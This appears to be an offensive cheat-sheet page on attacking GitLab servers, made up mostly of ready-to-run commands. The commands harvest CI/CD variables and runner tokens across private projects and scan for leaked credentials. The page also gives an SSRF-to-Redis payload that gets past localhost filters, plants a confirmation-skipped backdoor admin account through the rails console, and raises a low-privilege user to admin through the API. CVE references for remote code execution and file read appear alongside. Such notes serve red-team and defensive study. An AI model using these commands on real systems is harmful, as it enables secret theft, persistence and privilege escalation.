GitLab

Search for Secrets

Search for CI/CD variables and runner tokens:

TOKEN=`cat token`
GITLAB=gitlab.megacorp.local
API="https://$GITLAB/api/v4"

curl -sH "Authorization: Bearer $TOKEN" "$API/user" | jq

# 1. bash get_project_ids.sh <PAGE_NUMBER> | tee -a projects
curl -sH "Authorization: Bearer $TOKEN" "$API/groups/<GROUP_NAME_OR_ID>/projects/?include_subgroups=true&visibility=private&per_page=100&page=$1" | jq -r '.[].id'

# 2. bash get_secrets.sh
for id in `cat projects`; do
    curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id" | jq '.path'

    curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id/variables" | jq

    curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id" | jq .runners_token | jq
done

Search for credential leaks with gitleaks:

$ eget -qs linux/amd64 "zricethezav/gitleaks" --to gitleaks
$ TMPFILE=`mktemp`; ./gitleaks detect -s . -v -r $TMPFILE > /dev/null; cat $TMPFILE | jq; rm $TMPFILE

GitLab Runners Abuse

SSRF > Redis > RCE (CE/EE)

CVE-2018-19571, CVE-2018-19585

Also possible to use this payload (instead of IPv6) to bypass filter checks for localhost, but works only with git:// scheme:

git://127.0.0.1:6379/%0a<REDIS_COMMANDS>

Path Traversal > LFI > RCE (CE/EE)

CVE-2020-10977

Path Traversal > File Write > RCE (EE)

CVE-2019-19088

https://gitlab.com/gitlab-org/gitlab/-/issues/36029

gitlab-rails

https://docs.gitlab.com/ee/user/profile/account/create_accounts.html

Add new admin user from console:

$ sudo gitlab-rails console
irb(main):001:0 > ActiveRecord::Base.logger = Logger.new($stdout)
irb(main):002:0 > User.find(1)
=> #<User id:1 @root>
irb(main):003:0 > user = User.create(:username => 'snovvcrash', :password => 'Passw0rd!', :password_confirmation => 'Passw0rd!', :admin => true, :name => 'snovvcrash', :email => 'snovvcrash@megacorp.local')
irb(main):004:0 > user.save!
irb(main):005:0 > user.confirmation_token
=> "ZVrM4KsyEdSoTJvo8kx_"

Then activate the account by navigating to https://gitlab.megacorp.local/users/confirmation?confirmation_token=ZVrM4KsyEdSoTJvo8kx_.

Or just skip the verification:

irb(main):003:0 > user.skip_confirmation!
irb(main):004:0 > user.save!

Also for GitLab >= 16.11 personal space assignment is required:

irb(main):003:0 > user.assign_personal_namespace(Organizations::Organization.default_organization)
irb(main):004:0 > user.save!

Enable password authentication for web (e. g., when only LDAP authentication is available):

$ sudo gitlab-rails console
irb(main):001:0 > Gitlab::CurrentSettings.update!(password_authentication_enabled_for_web: true)
irb(main):002:0 > exit
$ sudo gitlab-ctl reconfigure

Grant a low-priv user admin's privileges via API:

# Check token priveleges
$ curl -sX GET -H "PRIVATE-TOKEN: $ADMIN_TOKEN" "https://gitlab.megacorp.local/api/v4/user" | jq '.is_admin'
# Grant low-priv user admin's privileges
$ curl -sX PUT -H "PRIVATE-TOKEN: $ADMIN_TOKEN" "https://gitlab.megacorp.local/api/v4/users/$LOWPRIV_ID" -d "admin=true" | jq '.is_admin'
# Revert low-priv user's original privileges
$ curl -sX PUT -H "PRIVATE-TOKEN: $ADMIN_TOKEN" "https://gitlab.megacorp.local/api/v4/users/$LOWPRIV_ID" -d "admin=false" | jq '.is_admin'

Arbitrary File Read

CVE-2023-2825

Last updated 4 days ago